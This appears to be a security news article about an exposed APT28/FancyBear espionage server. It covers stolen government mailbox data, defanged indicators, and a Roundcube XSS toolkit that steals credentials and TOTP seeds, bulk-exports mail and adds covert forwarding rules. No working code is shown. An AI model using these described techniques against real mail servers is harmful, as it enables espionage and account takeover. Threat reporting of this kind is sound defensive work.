FancyBear’s latest operational security failure has exposed a live Russian espionage server packed with stolen credentials, 2FA secrets, and detailed insight into the ongoing targeting of European government and military networks.
The exposed infrastructure, tied to APT28/FancyBear and previously reported by CERT‑UA and Hunt.io, reveals both the scale of the compromises and the carelessness of a threat actor often described as “sophisticated.”
Researchers from Ctrl‑Alt‑Intel, building on Hunt.io’s “Operation Roundish” findings, identified a second open directory on the same C2 server at 203.161.50[.]145, hosted on Namecheap infrastructure.
This open directory contained C2 source code, payloads, logs, and exfiltrated data, giving rare visibility into FancyBear operations from the attacker’s own server.
Analysts found more than 2,800 exfiltrated emails, over 240 credential sets (including TOTP 2FA secrets), around 140 persistent forwarding rules, and over 11,500 harvested contact addresses.
Victim mailboxes belonged to government and military entities in Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia, including regional Ukrainian prosecutors, the Romanian Air Force, and Greece’s National Defence General Staff.
Several of these countries are NATO members or are closely aligned with NATO, aligning the targeting with Russia’s strategic interest in Ukraine‑related military logistics and support.
FancyBear Server
CERT‑UA had already tied the same IP address, 203.161.50[.]145, to APT28 activity in advisories from late 2024, covering Roundcube exploitation and a ClickFix / fake reCAPTCHA spear‑phishing chain.
Despite this public exposure, FancyBear continued to operate from the same server for roughly 500 days, into early 2026, contradicting the common assumption that APT infrastructure is quickly rotated once burned.
Censys telemetry and Hunt.io captures show multiple open directories on port 8889 between January and March 2026, one of which was later found by Ctrl‑Alt‑Intel to host additional tooling and logs.
The root cause was a basic but critical OPSEC mistake: leaving HTTP open directories exposed while staging payloads and exfiltrated data.
- These dates are when Censys scanned & identified open ports, but it is very likely was open before & after these times
- This threat actor had multiple open-directories from January – March 2026, although each was on the port
8889
The open-directory scanned and archived by Hunt.io on 13th January 2026 10:41 UTC was located within a different directory than the one discussed by Ctrl-Alt-Intel.
This allowed defenders not only to download the full toolkit but also to observe campaign evolution and operator behavior in near real time as files and logs were updated.
The toolkit centers on JavaScript payloads injected into Roundcube (and, in a newly documented variant, SquirrelMail) via XSS vulnerabilities. Once executed in a victim’s browser, the Roundcube payload (“worker.js” family) can silently:
- Identify the logged‑in user.
- Steal credentials using hidden auto‑fill forms and click‑based exfiltration.
- Bulk‑exfiltrate entire Inbox and Sent folders as .eml files.
- Load modular scripts to add Sieve forwarding rules, steal address books, and extract TOTP secrets.
One module, keyTwoAuth.js, targets the twofactor_gauthenticator plugin to pull the TOTP seed and recovery codes directly from the 2FA settings page, then exfiltrates them in base64 form.
C2 logs show hundreds of entries where FancyBear successfully captured valid TOTP secrets, effectively enabling long‑term bypass of 2FA protections on high‑value mailboxes.
The phishing emails contained a link to the domain docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com where John Hammond’s reCAPTCHA Phish POC was used to deliver Metasploit payloads with the C2 IP address 203.161.50[.]145.
Another module, addRedirectMailBox.js, abuses Roundcube’s ManageSieve integration to create an always‑on forwarding rule that silently copies every incoming email to an attacker‑controlled ProtonMail account, persisting even if the initial XSS path is closed.
Geopolitical and defensive implications
The victim set aligns closely with states providing military aid, logistics, or training linked to Ukraine, including Romania, Bulgaria, Greece, and Ukraine itself, supporting the view that target selection is driven by regional military relevance rather than random opportunism.
The campaign also overlaps with ESET’s previously reported “Operation RoundPress” and CERT‑UA’s ClickFix / fake reCAPTCHA phishing operations, reinforcing the attribution to GRU‑linked APT28/FancyBear.
For defenders, this incident underlines several priorities: securing webmail platforms such as Roundcube and SquirrelMail, disabling or hardening ManageSieve and risky plugins where possible, and monitoring for indicators like zhblz[.]com and 203.161.50[.]145.
Crucially, it shows that even high‑end state actors can make simple OPSEC mistakes creating rare windows where defenders can see, and disrupt, espionage operations from the inside.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
